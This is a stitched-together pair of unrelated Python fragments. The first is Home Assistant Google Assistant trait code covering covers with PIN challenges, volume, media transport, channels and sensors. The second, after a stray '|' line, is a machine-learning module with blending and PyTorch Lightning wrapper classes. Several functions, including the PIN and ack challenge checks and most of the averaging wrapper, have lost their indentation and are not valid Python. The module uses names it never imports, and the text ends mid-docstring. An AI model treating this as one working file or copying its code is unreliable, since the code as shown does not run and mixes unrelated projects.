            response["discreteOnlyOpenClose"] = True
            if (
                features & cover.SUPPORT_OPEN == 0
                and features & cover.SUPPORT_CLOSE == 0
            ):
                response["queryOnlyOpenClose"] = True
        if self.state.attributes.get(ATTR_ASSUMED_STATE):
            response["commandOnlyOpenClose"] = True
        return response

    def query_attributes(self):
        """Return state query attributes."""
        domain = self.state.domain
        response = {}
        # When it's an assumed state, we will return empty state
        # This shouldn't happen because we set `commandOnlyOpenClose`
        # but Google still queries. Erroring here will cause device
        # to show up offline.
        if self.state.attributes.get(ATTR_ASSUMED_STATE):
            return response
        if domain == cover.DOMAIN:
            if self.state.state == STATE_UNKNOWN:
                raise SmartHomeError(
                    ERR_NOT_SUPPORTED, "Querying state is not supported"
                )
            position = self.state.attributes.get(cover.ATTR_CURRENT_POSITION)
            if position is not None:
                response["openPercent"] = position
            elif self.state.state != cover.STATE_CLOSED:
                response["openPercent"] = 100
            else:
                response["openPercent"] = 0
        elif domain == binary_sensor.DOMAIN:
            if self.state.state == STATE_ON:
                response["openPercent"] = 100
            else:
                response["openPercent"] = 0
        return response

    async def execute(self, command, data, params, challenge):
        """Execute an Open, close, Set position command."""
        domain = self.state.domain
        features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
        if domain == cover.DOMAIN:
            svc_params = {ATTR_ENTITY_ID: self.state.entity_id}
            should_verify = False
            if command == COMMAND_OPENCLOSE_RELATIVE:
                position = self.state.attributes.get(cover.ATTR_CURRENT_POSITION)
                if position is None:
                    raise SmartHomeError(
                        ERR_NOT_SUPPORTED,
                        # Fixed typo in user-facing message ("not know").
                        "Current position not known for relative command",
                    )
                position = max(0, min(100, position + params["openRelativePercent"]))
            else:
                position = params["openPercent"]
            if position == 0:
                service = cover.SERVICE_CLOSE_COVER
                should_verify = False
            elif position == 100:
                service = cover.SERVICE_OPEN_COVER
                should_verify = True
            elif features & cover.SUPPORT_SET_POSITION:
                service = cover.SERVICE_SET_COVER_POSITION
                if position > 0:
                    should_verify = True
                svc_params[cover.ATTR_POSITION] = position
            else:
                raise SmartHomeError(
                    ERR_NOT_SUPPORTED, "No support for partial open close"
                )
            # Opening a secure cover class (door/garage/gate) requires the
            # PIN challenge; closing never does.
            if (
                should_verify
                and self.state.attributes.get(ATTR_DEVICE_CLASS)
                in OpenCloseTrait.COVER_2FA
            ):
                _verify_pin_challenge(data, self.state, challenge)
            await self.hass.services.async_call(
                cover.DOMAIN, service, svc_params, blocking=True, context=data.context
            )
@register_trait
class VolumeTrait(_Trait):
    """Trait to control volume of a device.

    https://developers.google.com/actions/smarthome/traits/volume
    """

    name = TRAIT_VOLUME
    commands = [COMMAND_SET_VOLUME, COMMAND_VOLUME_RELATIVE, COMMAND_MUTE]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if trait is supported."""
        if domain == media_player.DOMAIN:
            return features & (
                media_player.SUPPORT_VOLUME_SET | media_player.SUPPORT_VOLUME_STEP
            )
        return False

    def sync_attributes(self):
        """Return volume attributes for a sync request."""
        features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
        return {
            "volumeCanMuteAndUnmute": bool(features & media_player.SUPPORT_VOLUME_MUTE),
            "commandOnlyVolume": self.state.attributes.get(ATTR_ASSUMED_STATE, False),
            # Volume amounts in SET_VOLUME and VOLUME_RELATIVE are on a scale
            # from 0 to this value.
            "volumeMaxLevel": 100,
            # Default change for queries like "Hey Google, volume up".
            # 10% corresponds to the default behavior for the
            # media_player.volume{up,down} services.
            "levelStepSize": 10,
        }

    def query_attributes(self):
        """Return volume query attributes."""
        response = {}
        level = self.state.attributes.get(media_player.ATTR_MEDIA_VOLUME_LEVEL)
        if level is not None:
            # Convert 0.0-1.0 to 0-100
            response["currentVolume"] = int(level * 100)
        muted = self.state.attributes.get(media_player.ATTR_MEDIA_VOLUME_MUTED)
        if muted is not None:
            response["isMuted"] = bool(muted)
        return response

    async def _set_volume_absolute(self, data, level):
        # level is on the media_player 0.0-1.0 scale.
        await self.hass.services.async_call(
            media_player.DOMAIN,
            media_player.SERVICE_VOLUME_SET,
            {
                ATTR_ENTITY_ID: self.state.entity_id,
                media_player.ATTR_MEDIA_VOLUME_LEVEL: level,
            },
            blocking=True,
            context=data.context,
        )

    async def _execute_set_volume(self, data, params):
        # Clamp the requested 0-100 level, then scale to 0.0-1.0.
        level = max(0, min(100, params["volumeLevel"]))
        if not (
            self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
            & media_player.SUPPORT_VOLUME_SET
        ):
            raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")
        await self._set_volume_absolute(data, level / 100)

    async def _execute_volume_relative(self, data, params):
        relative = params["relativeSteps"]
        features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
        if features & media_player.SUPPORT_VOLUME_SET:
            # NOTE(review): current is None when the volume-level attribute
            # is missing, which would raise TypeError below -- confirm this
            # path is only hit when the level is known.
            current = self.state.attributes.get(media_player.ATTR_MEDIA_VOLUME_LEVEL)
            target = max(0.0, min(1.0, current + relative / 100))
            await self._set_volume_absolute(data, target)
        elif features & media_player.SUPPORT_VOLUME_STEP:
            # No absolute set support: step up/down one unit at a time.
            svc = media_player.SERVICE_VOLUME_UP
            if relative < 0:
                svc = media_player.SERVICE_VOLUME_DOWN
                relative = -relative
            for _ in range(relative):
                await self.hass.services.async_call(
                    media_player.DOMAIN,
                    svc,
                    {ATTR_ENTITY_ID: self.state.entity_id},
                    blocking=True,
                    context=data.context,
                )
        else:
            raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")

    async def _execute_mute(self, data, params):
        mute = params["mute"]
        if not (
            self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
            & media_player.SUPPORT_VOLUME_MUTE
        ):
            raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")
        await self.hass.services.async_call(
            media_player.DOMAIN,
            media_player.SERVICE_VOLUME_MUTE,
            {
                ATTR_ENTITY_ID: self.state.entity_id,
                media_player.ATTR_MEDIA_VOLUME_MUTED: mute,
            },
            blocking=True,
            context=data.context,
        )

    async def execute(self, command, data, params, challenge):
        """Execute a volume command."""
        # Dispatch to the matching private handler.
        if command == COMMAND_SET_VOLUME:
            await self._execute_set_volume(data, params)
        elif command == COMMAND_VOLUME_RELATIVE:
            await self._execute_volume_relative(data, params)
        elif command == COMMAND_MUTE:
            await self._execute_mute(data, params)
        else:
            raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")
def _verify_pin_challenge(data, state, challenge):
"""Verify a pin challenge."""
if not data.config.should_2fa(state):
return
if not data.config.secure_devices_pin:
raise SmartHomeError(ERR_CHALLENGE_NOT_SETUP, "Challenge is not set up")
if not challenge:
raise ChallengeNeeded(CHALLENGE_PIN_NEEDED)
if challenge.get("pin") != data.config.secure_devices_pin:
raise ChallengeNeeded(CHALLENGE_FAILED_PIN_NEEDED)
def _verify_ack_challenge(data, state, challenge):
"""Verify an ack challenge."""
if not data.config.should_2fa(state):
return
if not challenge or not challenge.get("ack"):
raise ChallengeNeeded(CHALLENGE_ACK_NEEDED)
# Google transport-control command -> media_player feature bit the entity
# must report for that command to be supported.
MEDIA_COMMAND_SUPPORT_MAPPING = {
    COMMAND_MEDIA_NEXT: media_player.SUPPORT_NEXT_TRACK,
    COMMAND_MEDIA_PAUSE: media_player.SUPPORT_PAUSE,
    COMMAND_MEDIA_PREVIOUS: media_player.SUPPORT_PREVIOUS_TRACK,
    COMMAND_MEDIA_RESUME: media_player.SUPPORT_PLAY,
    COMMAND_MEDIA_SEEK_RELATIVE: media_player.SUPPORT_SEEK,
    COMMAND_MEDIA_SEEK_TO_POSITION: media_player.SUPPORT_SEEK,
    COMMAND_MEDIA_SHUFFLE: media_player.SUPPORT_SHUFFLE_SET,
    COMMAND_MEDIA_STOP: media_player.SUPPORT_STOP,
}

# Google transport-control command -> identifier reported in
# transportControlSupportedCommands during a sync request.
MEDIA_COMMAND_ATTRIBUTES = {
    COMMAND_MEDIA_NEXT: "NEXT",
    COMMAND_MEDIA_PAUSE: "PAUSE",
    COMMAND_MEDIA_PREVIOUS: "PREVIOUS",
    COMMAND_MEDIA_RESUME: "RESUME",
    COMMAND_MEDIA_SEEK_RELATIVE: "SEEK_RELATIVE",
    COMMAND_MEDIA_SEEK_TO_POSITION: "SEEK_TO_POSITION",
    COMMAND_MEDIA_SHUFFLE: "SHUFFLE",
    COMMAND_MEDIA_STOP: "STOP",
}
@register_trait
class TransportControlTrait(_Trait):
    """Trait to control media playback.

    https://developers.google.com/actions/smarthome/traits/transportcontrol
    """

    name = TRAIT_TRANSPORT_CONTROL
    commands = [
        COMMAND_MEDIA_NEXT,
        COMMAND_MEDIA_PAUSE,
        COMMAND_MEDIA_PREVIOUS,
        COMMAND_MEDIA_RESUME,
        COMMAND_MEDIA_SEEK_RELATIVE,
        COMMAND_MEDIA_SEEK_TO_POSITION,
        COMMAND_MEDIA_SHUFFLE,
        COMMAND_MEDIA_STOP,
    ]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        # Supported when the media player implements at least one mapped
        # transport feature.
        if domain == media_player.DOMAIN:
            for feature in MEDIA_COMMAND_SUPPORT_MAPPING.values():
                if features & feature:
                    return True
        return False

    def sync_attributes(self):
        """Return opening direction."""
        response = {}
        if self.state.domain == media_player.DOMAIN:
            features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
            support = []
            # Advertise only the commands the entity's feature flags allow.
            for command, feature in MEDIA_COMMAND_SUPPORT_MAPPING.items():
                if features & feature:
                    support.append(MEDIA_COMMAND_ATTRIBUTES[command])
            response["transportControlSupportedCommands"] = support
        return response

    def query_attributes(self):
        """Return the attributes of this trait for this entity."""
        return {}

    async def execute(self, command, data, params, challenge):
        """Execute a media command."""
        service_attrs = {ATTR_ENTITY_ID: self.state.entity_id}
        if command == COMMAND_MEDIA_SEEK_RELATIVE:
            service = media_player.SERVICE_MEDIA_SEEK
            rel_position = params["relativePositionMs"] / 1000
            seconds_since = 0  # Default to 0 seconds
            if self.state.state == STATE_PLAYING:
                # While playing, the reported position is stale; add the
                # time elapsed since it was last updated.
                now = dt.utcnow()
                upd_at = self.state.attributes.get(
                    media_player.ATTR_MEDIA_POSITION_UPDATED_AT, now
                )
                seconds_since = (now - upd_at).total_seconds()
            position = self.state.attributes.get(media_player.ATTR_MEDIA_POSITION, 0)
            max_position = self.state.attributes.get(
                media_player.ATTR_MEDIA_DURATION, 0
            )
            # Clamp the target to [0, duration].
            service_attrs[media_player.ATTR_MEDIA_SEEK_POSITION] = min(
                max(position + seconds_since + rel_position, 0), max_position
            )
        elif command == COMMAND_MEDIA_SEEK_TO_POSITION:
            service = media_player.SERVICE_MEDIA_SEEK
            max_position = self.state.attributes.get(
                media_player.ATTR_MEDIA_DURATION, 0
            )
            service_attrs[media_player.ATTR_MEDIA_SEEK_POSITION] = min(
                max(params["absPositionMs"] / 1000, 0), max_position
            )
        elif command == COMMAND_MEDIA_NEXT:
            service = media_player.SERVICE_MEDIA_NEXT_TRACK
        elif command == COMMAND_MEDIA_PAUSE:
            service = media_player.SERVICE_MEDIA_PAUSE
        elif command == COMMAND_MEDIA_PREVIOUS:
            service = media_player.SERVICE_MEDIA_PREVIOUS_TRACK
        elif command == COMMAND_MEDIA_RESUME:
            service = media_player.SERVICE_MEDIA_PLAY
        elif command == COMMAND_MEDIA_SHUFFLE:
            service = media_player.SERVICE_SHUFFLE_SET
            # Google Assistant only supports enabling shuffle
            service_attrs[media_player.ATTR_MEDIA_SHUFFLE] = True
        elif command == COMMAND_MEDIA_STOP:
            service = media_player.SERVICE_MEDIA_STOP
        else:
            raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")
        await self.hass.services.async_call(
            media_player.DOMAIN,
            service,
            service_attrs,
            blocking=True,
            context=data.context,
        )
@register_trait
class MediaStateTrait(_Trait):
    """Trait to get media playback state.

    https://developers.google.com/actions/smarthome/traits/mediastate
    """

    name = TRAIT_MEDIA_STATE
    commands = []

    # HA media_player state -> Google activityState value.
    activity_lookup = {
        STATE_OFF: "INACTIVE",
        STATE_IDLE: "STANDBY",
        STATE_PLAYING: "ACTIVE",
        STATE_ON: "STANDBY",
        STATE_PAUSED: "STANDBY",
        STATE_STANDBY: "STANDBY",
        STATE_UNAVAILABLE: "INACTIVE",
        STATE_UNKNOWN: "INACTIVE",
    }

    # HA media_player state -> Google playbackState value.
    playback_lookup = {
        STATE_OFF: "STOPPED",
        STATE_IDLE: "STOPPED",
        STATE_PLAYING: "PLAYING",
        STATE_ON: "STOPPED",
        STATE_PAUSED: "PAUSED",
        STATE_STANDBY: "STOPPED",
        STATE_UNAVAILABLE: "STOPPED",
        STATE_UNKNOWN: "STOPPED",
    }

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain == media_player.DOMAIN

    def sync_attributes(self):
        """Return attributes for a sync request."""
        return {"supportActivityState": True, "supportPlaybackState": True}

    def query_attributes(self):
        """Return the attributes of this trait for this entity."""
        current = self.state.state
        # Unmapped states default to the most conservative values.
        return {
            "activityState": self.activity_lookup.get(current, "INACTIVE"),
            "playbackState": self.playback_lookup.get(current, "STOPPED"),
        }
@register_trait
class ChannelTrait(_Trait):
    """Trait to get media playback state.

    https://developers.google.com/actions/smarthome/traits/channel
    """

    name = TRAIT_CHANNEL
    commands = [COMMAND_SELECT_CHANNEL]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return bool(
            domain == media_player.DOMAIN
            and features & media_player.SUPPORT_PLAY_MEDIA
            and device_class == media_player.DEVICE_CLASS_TV
        )

    def sync_attributes(self):
        """Return attributes for a sync request."""
        # No channel list is exposed; Google can only issue commands.
        return {"availableChannels": [], "commandOnlyChannels": True}

    def query_attributes(self):
        """Return channel query attributes."""
        return {}

    async def execute(self, command, data, params, challenge):
        """Execute an setChannel command."""
        if command != COMMAND_SELECT_CHANNEL:
            raise SmartHomeError(ERR_NOT_SUPPORTED, "Unsupported command")
        channel_number = params.get("channelNumber")
        if not channel_number:
            raise SmartHomeError(
                ERR_NO_AVAILABLE_CHANNEL,
                "Channel is not available",
            )
        # Channels are tuned by playing media of type "channel".
        await self.hass.services.async_call(
            media_player.DOMAIN,
            media_player.SERVICE_PLAY_MEDIA,
            {
                ATTR_ENTITY_ID: self.state.entity_id,
                media_player.ATTR_MEDIA_CONTENT_ID: channel_number,
                media_player.ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_CHANNEL,
            },
            blocking=True,
            context=data.context,
        )
@register_trait
class SensorStateTrait(_Trait):
    """Trait to get sensor state.

    https://developers.google.com/actions/smarthome/traits/sensorstate
    """

    # HA sensor device class -> (Google sensor name, numeric unit).
    # Bug fix: CO is carbon MONOXIDE and CO2 is carbon DIOXIDE; the
    # original mapping had the two Google sensor names swapped.
    sensor_types = {
        sensor.DEVICE_CLASS_AQI: ("AirQuality", "AQI"),
        sensor.DEVICE_CLASS_CO: ("CarbonMonoxideLevel", "PARTS_PER_MILLION"),
        sensor.DEVICE_CLASS_CO2: ("CarbonDioxideLevel", "PARTS_PER_MILLION"),
        sensor.DEVICE_CLASS_PM25: ("PM2.5", "MICROGRAMS_PER_CUBIC_METER"),
        sensor.DEVICE_CLASS_PM10: ("PM10", "MICROGRAMS_PER_CUBIC_METER"),
        sensor.DEVICE_CLASS_VOLATILE_ORGANIC_COMPOUNDS: (
            "VolatileOrganicCompounds",
            "PARTS_PER_MILLION",
        ),
    }

    name = TRAIT_SENSOR_STATE
    commands = []

    @classmethod
    def supported(cls, domain, features, device_class, _):
        """Test if state is supported."""
        return domain == sensor.DOMAIN and device_class in cls.sensor_types

    def sync_attributes(self):
        """Return attributes for a sync request.

        Returns None (implicitly) when the device class is not mapped.
        """
        device_class = self.state.attributes.get(ATTR_DEVICE_CLASS)
        if (data := self.sensor_types.get(device_class)) is not None:
            return {
                "sensorStatesSupported": {
                    "name": data[0],
                    "numericCapabilities": {"rawValueUnit": data[1]},
                }
            }

    def query_attributes(self):
        """Return the attributes of this trait for this entity.

        Returns None (implicitly) when the device class is not mapped.
        """
        device_class = self.state.attributes.get(ATTR_DEVICE_CLASS)
        if (data := self.sensor_types.get(device_class)) is not None:
            return {
                "currentSensorStateData": [
                    {"name": data[0], "rawValue": self.state.state}
                ]
            }
|
# coding:utf-8
import os
import pathlib
import numpy as np
import pandas as pd
import lightgbm as lgb
import pytorch_lightning as pl
from pytorch_lightning.callbacks import EarlyStopping, ModelCheckpoint
from pytorch_lightning.loggers import WandbLogger
from DNNmodel import *
from utils import *
def extractModelParameters(original_param, model):
    """Keep only the entries of original_param that model.get_params() accepts.

    Prints the filtered dict (matching the original behavior) and returns it.
    """
    valid_keys = model.get_params().keys()
    model_params = {k: v for k, v in original_param.items() if k in valid_keys}
    print(model_params)
    return model_params
def extractModelParametersWithStr(original_param, exclude_str="__"):
    """Filter a parameter dict, dropping every key that contains exclude_str.

    Idiom fix: uses ``exclude_str not in k`` (instead of ``not exclude_str
    in k``) and a dict comprehension.  Prints the filtered dict (matching the
    original behavior) and returns it.

    Args:
        original_param: mapping of parameter name -> value.
        exclude_str: substring marking keys to exclude (default "__").

    Returns:
        New dict with only the keys that do not contain exclude_str.
    """
    model_params = {k: v for k, v in original_param.items() if exclude_str not in k}
    print(model_params)
    return model_params
class Averaging_Wrapper(object):
def __init__(self, df_train, df_test, target_col, path_to_meta_feature_dir, rate_list=None):
self.model = None
self.initial_params = {
"random_seed_name__":"random_state",
}
self.target_col = target_col
self.rate_list_ = rate_list
self.best_iteration_ = 1
self.df_meta_train, self.df_meta_test = self.setMetaFromFiles(path_to_meta_feature_dir)
idx1 = set(self.df_meta_train.index)
idx2 = set(df_train.index)
print(f"df_meta_train : {self.df_meta_train.shape}")
print(f"df_train : {df_train.shape}")
self.df_meta_train[target_col] = df_train.loc[self.df_meta_train.index, target_col]
def setMeta(self, df_train, df_test, target_col:str, y_pred_list:list, oof_list:list):
np_y_pred = np.concatenate(y_pred_list, 1)
np_oof = np.concatenate(oof_list, 1)
print(np_y_pred.shape)
print(np_oof.shape)
self.df_meta_test = pd.DataFrame(np_y_pred, index=df_test.index)
self.df_meta_train = pd.DataFrame(np_oof, index=df_train.index)
self.df_meta_train[target_col] = df_train[target_col]
def setMetaFromFiles(self, path_to_meta_feature_dir):
pp_dir = pathlib.Path(path_to_meta_feature_dir)
y_pred_list=[]
oof_list = []
name_list = []
for f in pp_dir.glob('*--_oof.csv'):
oof_f_name = f.name
name_list.append(oof_f_name)
print(oof_f_name)
df_oof = pd.read_csv(str(f.parent/oof_f_name), index_col=0)[self.target_col]
print(f"df_oof : {df_oof}")
oof_list.append(df_oof)
pred_f_name = oof_f_name.replace("oof", "submission")
print(pred_f_name)
df_pred = pd.read_csv(str(f.parent/pred_f_name), index_col=0)[self.target_col]
print(f"df_pred : {df_pred}")
y_pred_list.append(df_pred)
df_oof = pd.concat(oof_list, axis=1)
df_oof.columns = name_list
#df_oof.columns=[i for i in range(0, len(df_oof.columns))]
has_null_row_index = df_oof.loc[df_oof.isnull().any(axis=1)].index
df_oof = df_oof.loc[~df_oof.index.isin(has_null_row_index)]
df_pred = pd.concat(y_pred_list, axis=1)
df_pred.columns = name_list
#df_pred.columns=[i for i in range(0, len(df_pred.columns))]
self.name_list = name_list
#pdb.set_trace()
return df_oof, df_pred
def procModelSaving(self, model_dir_name, prefix, bs):
ppath_to_save_dir = PATH_TO_MODEL_DIR / model_dir_name
if not ppath_to_save_dir.exists():
ppath_to_save_dir.mkdir()
se_rate = pd.Series(self.rate_list_, index=self.name_list)
ppath_to_rate_file = ppath_to_save_dir / "rate.csv"
if ppath_to_rate_file.exists():
df_rate = pd.read_csv(ppath_to_rate_file, index_col=0)
se_rate.name = f"fold{df_rate.shape[1]}"
df_rate = pd.concat([df_rate, se_rate], axis=1)
else:
se_rate.name = "fold0"
df_rate = pd.DataFrame(se_rate)
df_rate.to_csv(ppath_to_rate_file)
print("######################")
print("### rate ###")
print(df_rate.mean(axis=1))
#pdb.set_trace()
def fit(self, X_train, y_train, X_valid=None, y_valid=None, X_holdout=None, y_holdout=None, params=None):
    """Fit per-column blending rates by Nelder-Mead on the first eval metric.

    When ``self.rate_list_`` is already set (e.g. passed to the constructor)
    the optimization is skipped and only scores are computed.
    Sets ``self.best_score_`` (dict of train/valid/holdout metric dicts) and
    a zero feature-importance vector for interface compatibility.
    """
    best_score_dict = {}
    eval_metric_func_dict = params["eval_metric_func_dict__"]
    print(X_train)
    if self.rate_list_ is None:  # fixed: identity check, not == None
        # Optimize one weight per meta-feature column, starting at 0.5 each,
        # minimizing the first metric in the dict.
        f = list(eval_metric_func_dict.values())[0]

        def calc_loss_f(_rate_list, df_input_X, y_true):
            # Weighted sum of column predictions, scored by the metric.
            this_pred = np.zeros(len(df_input_X))
            for c, r in zip(df_input_X.columns, _rate_list):
                this_pred += (df_input_X[c] * r).values
            score = f(y_pred=this_pred, y_true=y_true)
            return score

        initial_rate_list = [0.5] * X_train.shape[1]
        loss_partial = partial(calc_loss_f, df_input_X=X_train, y_true=y_train.values)
        opt_result = sp.optimize.minimize(loss_partial, initial_rate_list, method='nelder-mead')
        self.rate_list_ = opt_result["x"].tolist()
        print(f"***** opt result : {self.rate_list_} *****")
        print()
    y_train_pred = self.predict(X_train)
    print(y_train_pred)
    best_score_dict["train"] = calcEvalScoreDict(y_true=y_train.values, y_pred=y_train_pred, eval_metric_func_dict=eval_metric_func_dict)
    if X_valid is not None:
        y_valid_pred = self.predict(X_valid)
        best_score_dict["valid"] = calcEvalScoreDict(y_true=y_valid.values, y_pred=y_valid_pred, eval_metric_func_dict=eval_metric_func_dict)
    if X_holdout is not None:
        y_holdout_pred = self.predict(X_holdout)
        best_score_dict["holdout"] = calcEvalScoreDict(y_true=y_holdout.values, y_pred=y_holdout_pred, eval_metric_func_dict=eval_metric_func_dict)
    self.best_score_ = best_score_dict
    print(self.best_score_)
    self.setFeatureImportance(X_train.columns)
def predict(self, X_test, oof_flag=True):
    """Blend meta-feature columns with the fitted rates.

    Falls back to a plain row-mean when no rates were fitted.
    NOTE(review): the fallback returns a 1-D array while the fitted branch
    returns shape (n, 1); callers appear to accept both — confirm before
    unifying.
    """
    if self.rate_list_ is None:  # fixed: identity check, not == None
        print(f"X_test : {X_test}")
        print(f"X_test.mean(axis=1) : {X_test.mean(axis=1)}")
        return X_test.mean(axis=1).values
    pred = np.zeros(len(X_test))
    for col, rate in zip(X_test.columns, self.rate_list_):
        pred += (X_test[col] * rate).values
    return pred.reshape(-1, 1)
def setFeatureImportance(self, columns_list):
    """Averaging has no per-feature importances; expose an all-zero vector."""
    self.feature_importances_ = np.array([0.0] * len(columns_list))
class PytrochLightningBase():
    """Base wrapper exposing an sklearn-like fit/predict API over a
    pytorch-lightning model.

    NOTE(review): the misspelling "Pytroch" is kept because subclasses and
    callers reference this exact name.
    """
    def __init__(self):
        super().__init__()
        # Defaults shared by all subclasses; subclasses extend this dict.
        self.initial_params = {
            "eval_max_or_min": "min",
            "val_every": 1,
            "dataset_params": {},
            "random_seed_name__": "random_state",
            'num_class': 1, #binary classification as regression with value between 0 and 1
            "use_gpu": 1,
            'multi_gpu': False,
        }
        self.edit_params = {}
        self.best_iteration_ = 1
        self.reload_flag = False  # True once weights were reloaded from disk
        self.model = None

    def fit(self, X_train, y_train, X_valid=None, y_valid=None, X_holdout=None, y_holdout=None, params=None):
        """Train self.model with pytorch-lightning.

        Sets ``self.trainer``, ``self.best_score_``, ``self.best_iteration_``
        and a zero feature-importance vector (NNs have none).
        """
        params = prepareModelDir(params, self.__class__.__name__)
        self.edit_params = params
        pl.seed_everything(params[params["random_seed_name__"]])
        torch.backends.cudnn.enabled = True
        self.model.setParams(params)
        batch_size = params["batch_size"]
        if batch_size < 0:
            # Negative batch_size means full-batch training.
            batch_size = X_train.shape[0]
        data_set_train = params["dataset_class"](X_train, y_train, params["dataset_params"], train_flag=True)
        dataloader_train = torch.utils.data.DataLoader(data_set_train, batch_size=batch_size, shuffle=True, collate_fn=params["collate_fn"], num_workers=params["num_workers"])
        dataloader_val = None
        if X_valid is not None:
            data_set_val = params["dataset_class"](X_valid, y_valid, params["dataset_params"], train_flag=True)
            dataloader_val = torch.utils.data.DataLoader(data_set_val, batch_size=batch_size, shuffle=False, collate_fn=params["collate_fn"], num_workers=params["num_workers"])
        wandb_logger = None
        if (not ON_KAGGLE) and (params["no_wandb"] == False):
            wandb_run = wandb.init(project=PROJECT_NAME, group=params["wb_group_name"], reinit=True, name=params["wb_run_name"])
            # BUG FIX: keyword was misspelled "experment"; the created run was
            # silently ignored and WandbLogger started its own run.
            wandb_logger = WandbLogger(experiment=wandb_run)
            wandb_logger.log_hyperparams(params)
        # BUG FIX: f-strings nested the same quote character
        # (f'val_{params['eval_metric']}'), a SyntaxError before Python 3.12.
        monitor_name = f'val_{params["eval_metric"]}'
        early_stop_callback = EarlyStopping(
            monitor=monitor_name,
            min_delta=0.00,
            patience=params['early_stopping_rounds'],
            verbose=True,
            mode=params['eval_max_or_min']
        )
        checkpoint_callback = ModelCheckpoint(
            dirpath=PATH_TO_MODEL_DIR / params["model_dir_name"],
            filename=params["path_to_model"].stem,
            verbose=True,
            monitor=monitor_name,
            mode=params['eval_max_or_min'],
            save_weights_only=True,
        )
        callbacks_list = []
        # Early stopping / checkpointing only when it can trigger within the run.
        if params['early_stopping_rounds'] <= self.initial_params["epochs"]:
            callbacks_list = [early_stop_callback, checkpoint_callback]
        metrics_callback = MetricsCallback(monitor_metric=monitor_name, min_max_flag=params['eval_max_or_min'])
        callbacks_list.append(metrics_callback)
        self.trainer = pl.Trainer(
            num_sanity_val_steps=0,
            gpus=self.initial_params["use_gpu"],
            check_val_every_n_epoch=self.initial_params["val_every"],
            max_epochs=self.initial_params["epochs"],
            accumulate_grad_batches=self.initial_params["accumulate_grad_batches"],
            callbacks=callbacks_list,
            logger=wandb_logger,
        )
        self.trainer.fit(self.model, dataloader_train, dataloader_val)
        if X_valid is None:
            # No validation loop ran, so save the final weights manually
            # under a versioned name.
            new_path = checkExistsAndAddVnum(params["path_to_model"])
            self.trainer.save_checkpoint(str(new_path))
        self.best_score_, self.best_iteration_ = metrics_callback.getScoreInfo()
        print(self.best_score_)
        self.feature_importances_ = np.zeros(len(X_train.columns))

    def predict(self, X_test, oof_flag=False):
        """Run inference, optionally with test-time augmentation (num_tta>1);
        returns the mean prediction over TTA passes."""
        num_tta = self.edit_params["num_tta"]
        batch_size = self.edit_params["batch_size"]
        # The dataset class expects a target frame; feed zeros at inference.
        dummy_y = pd.DataFrame(np.zeros((X_test.shape[0], 1)), index=X_test.index)
        data_set_test = self.edit_params["dataset_class"](X_test, dummy_y, self.edit_params["dataset_params"], train_flag=(num_tta > 1))
        dataloader_test = torch.utils.data.DataLoader(data_set_test, batch_size=batch_size, shuffle=False, collate_fn=self.edit_params["collate_fn"], num_workers=self.edit_params["num_workers"])
        self.model.oof_prediction = oof_flag
        if self.model.oof_prediction == False:
            self.trainer.logger = None
        tta_list = []
        for tta_i in range(num_tta):
            print(f"tta : {tta_i+1}th")
            if self.reload_flag:
                # Reloaded weights live in self.model; don't look for a checkpoint.
                self.trainer.test(test_dataloaders=dataloader_test, model=self.model)
            else:
                self.trainer.test(test_dataloaders=dataloader_test, ckpt_path='best')
            final_preds = self.model.final_preds
            tta_list.append(final_preds)
        return np.array(tta_list).mean(axis=0)

    def procModelSaving(self, model_dir_name, prefix, bs):
        """Save model weights plus the best-score dict ``bs`` as json."""
        ppath_to_save_dir = PATH_TO_MODEL_DIR / model_dir_name
        if not ppath_to_save_dir.exists():
            ppath_to_save_dir.mkdir()
        ppath_to_model = ppath_to_save_dir / f"model__{prefix}__{model_dir_name}__{self.__class__.__name__}.pkl"
        torch.save(self.model.state_dict(), str(ppath_to_model))
        print(f'Trained nn model was saved! : {ppath_to_model}')
        with open(str(ppath_to_model).replace("model__", "bs__").replace("pkl", "json"), 'w') as fp:
            json.dump(bs, fp)

    def procLoadModel(self, model_dir_name, prefix, params):
        """Load saved weights and score json; return 0 on success, -1 if missing."""
        self.edit_params = params
        self.model.cuda()
        if params["multi_gpu"]:
            self.model = nn.DataParallel(self.model)
        ppath_to_save_dir = PATH_TO_UPLOAD_MODEL_PARENT_DIR / model_dir_name
        print(f"ppath_to_save_dir : {ppath_to_save_dir}")
        print(list(ppath_to_save_dir.glob(f'model__{prefix}*')))
        name_list = list(ppath_to_save_dir.glob(f'model__{prefix}*'))
        if len(name_list) == 0:
            print(f'[ERROR] Trained nn model was NOT EXITS! : {prefix}')
            return -1
        ppath_to_model = name_list[0]
        ppath_to_ckpt_model = searchCheckptFile(ppath_to_save_dir, ppath_to_model, prefix)
        self.model.load_state_dict(torch.load(str(ppath_to_ckpt_model))["state_dict"])
        print(f'Trained nn model was loaded! : {ppath_to_ckpt_model}')
        # The stored filename encodes the best iteration as "iter_<N>__".
        # (raw string fixes the invalid \d escape warning)
        a = int(re.findall(r'iter_(\d+)__', str(ppath_to_model))[0])
        self.best_iteration_ = a
        path_to_json = str(ppath_to_model).replace("model__", "bs__").replace("pkl", "json")
        if not os.path.exists(path_to_json):
            print(f'[ERROR] Trained nn json was NOT EXITS! : {path_to_json}')
            return -1
        with open(path_to_json) as fp:
            self.best_score_ = json.load(fp)
        self.trainer = pl.Trainer(
            num_sanity_val_steps=0,
            gpus=self.edit_params["use_gpu"],
            check_val_every_n_epoch=self.edit_params["val_every"],
            max_epochs=self.edit_params["epochs"],
        )
        self.reload_flag = True
        return 0
class BERT_Wrapper(PytrochLightningBase):
    """Lightning wrapper that builds a ``myBert`` model combining a text
    feature, categorical-embedding features and continuous features.

